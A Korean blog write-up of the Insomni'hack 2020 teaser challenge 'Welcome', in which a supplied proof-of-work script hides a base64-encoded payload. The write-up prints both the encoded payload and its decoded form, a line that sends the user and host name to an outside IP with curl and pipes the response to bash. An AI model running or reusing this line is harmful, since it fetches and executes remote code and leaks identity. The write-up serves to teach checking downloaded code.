• Writeup/CTF_Writeup

    [Insomni'hack teaser] Welcome

    2020. 1. 21.

    by. ugonfor

    문제:

    This year we added a Proof of Work to some of our challenges.

    Just run python pow.py <target>, were target is the value provided by the server and get the flag.

    nc welcome.insomnihack.ch 1337

    nc welcome.insomnihack.ch 1337 를 하면 다음과 같은 shell이 나온다.

    ryuhyogon@ubuntu:~/Desktop$ nc welcome.insomnihack.ch 1337

    ======================================================================
    ============   Welcome to the Insomni'Hack Teaser 2020!   ============
    ======================================================================
     
    Give me an input whose md5sum starts with "1461ce" and get the flag ;)

    문제에서는 python [pow.py](http://pow.py) <target> 이라 하였으니, python [pow.py](http://pow.py) 1464ce 를 해봤다.

    ryuhyogon@ubuntu:~/Desktop$ ./pow-b39e9d8f81a48ac92097ce060d587ace718c2db8bc9b3906ac640b90a62dc497.py 1461ce
    sh: 1: curl: not found
    1433358

    1433358이 나와서 입력해보았더니

    ======================================================================
    ============   Welcome to the Insomni'Hack Teaser 2020!   ============
    ======================================================================
     
    Give me an input whose md5sum starts with "1461ce" and get the flag ;)
    1433358

                   «Welcome to the wall of shame 2.0!» ~Mallory

    다음처럼 나옴.

    그래서 pow.py 파일을 열어보았다.

    #!/usr/bin/python3
     
    import base64
    import hashlib
    import os
    import sys
     
    target = sys.argv[1]
    i = 0
     
    def pow():
        global i, target
        while True:
            m = hashlib.md5()
            m.update(str(i).encode())
            h = m.hexdigest()
            if h[:6] == target:
                exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
                print(i)
                exit(0)
            i += 1
     
    if __name__ == '__main__':
        pow()

    base64.b64decode의 값을 확인해 보니,

    global i;i+=1337;[x=os.name](http://x%3Dos.name/);x+="/$(whoami)@$(hostname)|bash"if x!="nt"else"/%USERNAME%@%USERDOMAIN%";os.system("curl -Ns 34.65.187.141/"+x)

    이었다.

    다음값을 주석처리하고 다시 시도해보니,

    ======================================================================
    ============   Welcome to the Insomni'Hack Teaser 2020!   ============
    ======================================================================
     
    Give me an input whose md5sum starts with "574558" and get the flag ;)
    5383078     

    MITM are real: check SHA, check code, ...
     
    INS{Miss me with that fhisy line}

    Flag: INS{Miss me with that fhisy line}

    저작자표시 비영리 동일조건

    'Writeup > CTF_Writeup' 카테고리의 다른 글

    [ Defenit CTF 2020 ] Lord fool song remix  (0) 2020.06.08
    [ Defenit CTF 2020 ] momsTouch  (0) 2020.06.08
    [ RCTF 2020 ] rust-flag  (0) 2020.06.02
    [ CODEGATE 2020 Preliminary ] RS(702pt) wripte-up  (3) 2020.02.09
    [Insomni'hack teaser] Kaboom writeup  (0) 2020.01.21

    댓글

    관련글

    맨 위로
전체 글 보기

티스토리툴바